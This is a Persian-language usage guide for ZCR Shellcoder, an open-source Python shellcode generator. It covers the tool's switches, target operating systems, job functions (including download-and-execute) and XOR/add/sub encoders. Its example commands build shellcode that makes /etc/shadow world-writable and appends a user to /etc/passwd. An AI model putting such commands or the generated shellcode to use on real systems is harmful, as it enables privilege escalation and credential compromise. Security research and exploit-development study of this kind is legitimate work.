

ZCR Shellcoder

نویسنده: علی رزنجیو

ZeroDay Cyber Research Shellcoder (تولید کننده) یک نرم افزار متن باز به زبان پایتون میباشد که به شما امکان ساخت شلکد سفارشی (customized) را برای سیستم عامل های لیست شده میدهد. این نرم افزار توانایی اجرا در Windows/Linux&Unix/OSX و سیستم های دیگر تحت پایتون 2.7.x را دارد.

چگونگی کار؟

برای نشان دادن لیست سوچ ها ، سوچ "-h" یا "--h" یا "-help" یا "--help" را اجرا کنید.

```
ZeroDay Cyber Research Shellcoder

Switches:
-h, --h, -help, --help => to see this help guide
-os => choose your os to create shellcode
-oslist => list os for switch -os
-o => output filename
-job => what shellcode gonna do for you ?
-joblist => list of -job switch
-encode => generate shellcode with encode
-types => types of encode for -encode switch
-update => check for update

Author Website: http://z3r0d4y.com/
Project URL: http://www.z3r0d4y.com/p/zcr-shellcoder.html
Ali@Z3r0D4y.Com
key: ASIIN_BLUE_RUBY ; version: 1.0.0 ; Release Date: 2015 May 22
```

سوچ OS- به شما اجازه میدهد تا سیستم عامل تارگت (هدف) خود را انتخاب کنید. برای دیدن لیست سیستم عامل ها از سوچ -oslist استفاده کنید.

```
[+] linux_x86
[+] linux_x64
[+] linux_arm
[+] linux_mips
[+] freebsd_x86
[+] freebsd_x64
[+] windows_x86
[+] windows_x64
[+] osx
[+] solaris_x86
[+] solaris_x64

Author Website: http://z3r0d4y.com/
Project URL: http://www.z3r0d4y.com/p/zcr-shellcoder.html
Ali@Z3r0D4y.Com
key: ASIIN_BLUE_RUBY ; version: 1.0.0 ; Release Date: 2015 May 22
```

سوچ 0- جهت انتخاب نام فایل خروجی شما را که در پوشه output تولید خواهد شد میباشد.

سوچ job- جهت انتخاب فانکشن (Function) برای تولید شلکد میباشد. شما میتوانید با استفاده از سوچ joblist- لیست فانکشن ها را مشاهده کنید.

```
[+] exec('/path/file')
[+] chmod('/path/file','permission number')
[+] write('/path/file','text to write')
[+] file_create('/path/file','text to write')
[+] dir_create('/path/folder')
[+] download('url','filename')
[+] download_execute('url','filename','command to execute')
[+] system('command to execute')
[+] script_executor('name of script','path and name of your script in your pc','execute command')

Author Website: http://z3r0d4y.com/
Project URL: http://www.z3r0d4y.com/p/zcr-shellcoder.html
Ali@Z3r0D4y.Com
key: ASIIN_BLUE_RUBY ! version: 1.0.0 ! Release Date: 2015 May 22
```

سوچ encode- جهت انتخاب نوع انکود (Encode) شلکد خروجی میباشد، برای مشاهده لیست انکود ها از سوچ types- استفاده کنید.

```
[+] none
[+] xor_random
[+] xor_yourvalue
[+] add_random
[+] add_yourvalue
[+] sub_random
[+] sub_yourvalue
[+] inc
[+] inc_timesyouwant
[+] dec
[+] dec_timesyouwant
[+] mix_all

Author Website: http://z3r0d4y.com/
Project URL: http://www.z3r0d4y.com/p/zcr-shellcoder.html
Ali@Z3r0D4y.Com
key: ASIIN_BLUE_RUBY ! version: 1.0.0 ! Release Date: 2015 May 22
```

سوچ update- جهت آپدیت کردن نرم افزار استفاده میشود، همچنین شما میتوانید آرشیو فایل ها را در لینک زیر مشاهده کنید.

<https://github.com/Ali-Razmjoo/ZCR-Shellcoder-Archive>

و آخرین آپدیت در اینجا در دسترس میباشد: <https://github.com/Ali-Razmjoo/ZCR-Shellcoder>

و: <http://www.z3r0d4y.com/p/zcr-shellcoder.html>

ویژگی های موجود:

OS_LIST / Functions	Linux x86	Linux x64	Linux Arm	Linux Mips	FreeBSD X64	FreeBSD x86	Windows x64	Windows x86	OSX	Solaris x64	Solaris x86
exec	1	0	0	0	0	0	0	0	0	0	0
chmod	1	0	0	0	0	0	0	0	0	0	0
write	1	0	0	0	0	0	0	0	0	0	0
file_create	0	0	0	0	0	0	0	0	0	0	0
dir_create	0	0	0	0	0	0	0	0	0	0	0
download	0	0	0	0	0	0	0	0	0	0	0
download_execute	0	0	0	0	0	0	0	0	0	0	0
system	0	0	0	0	0	0	0	0	0	0	0
script_executor	0	0	0	0	0	0	0	0	0	0	0
Encodes											
none	1	1	1	1	1	1	1	1	1	1	1
xor_random	0	0	0	0	0	0	0	0	0	0	0
xor_yourvalue	0	0	0	0	0	0	0	0	0	0	0
add_random	0	0	0	0	0	0	0	0	0	0	0
add_yourvalue	0	0	0	0	0	0	0	0	0	0	0
sub_random	0	0	0	0	0	0	0	0	0	0	0
sub_yourvalue	0	0	0	0	0	0	0	0	0	0	0
inc	0	0	0	0	0	0	0	0	0	0	0
inc_timesyouwant	0	0	0	0	0	0	0	0	0	0	0
dec	0	0	0	0	0	0	0	0	0	0	0
dec_timesyouwant	0	0	0	0	0	0	0	0	0	0	0
mix_all	0	0	0	0	0	0	0	0	0	0	0

نمونه دستورات اجرایی:

Windows cmd:

```
python shellcoder.py -os linux_x86 -job chmod('/etc/shadow','777') -encode none -o shellcode.asm
```

```
python shellcoder.py -os linux_x86 -job write('/etc/passwd','Ali.....[add user]') -encode none -o shellcode.asm
```

```
python shellcoder.py -os linux_x86 -job exec('/usr/bin/python') -encode none -o shellcode.asm
```

Linux and OSX Terminal:

you need to put a "\" behind the "(" and "\"" char in your switch.

```
python shellcoder.py -os linux_x86 -job chmod('\'/etc/shadow\'', \'777\'') -encode none -o shellcode.asm
```

```
python shellcoder.py -os linux_x86 -job write('\'/etc/passwd\'', \'Ali.....[add user] \') -encode none -o shellcode.asm
```

```
python shellcoder.py -os linux_x86 -job exec('\'/usr/bin/python\'') -encode none -o shellcode.asm
```

برای اطلاعات بیشتر و آنالیز برنامه و راهنمایی از وبسایت z3r0d4y.com بازدید فرمایید.

منبع

ZeroDay Cyber Research z3r0d4y.com

home : <http://z3r0d4y.com/zcr-shellcoder/>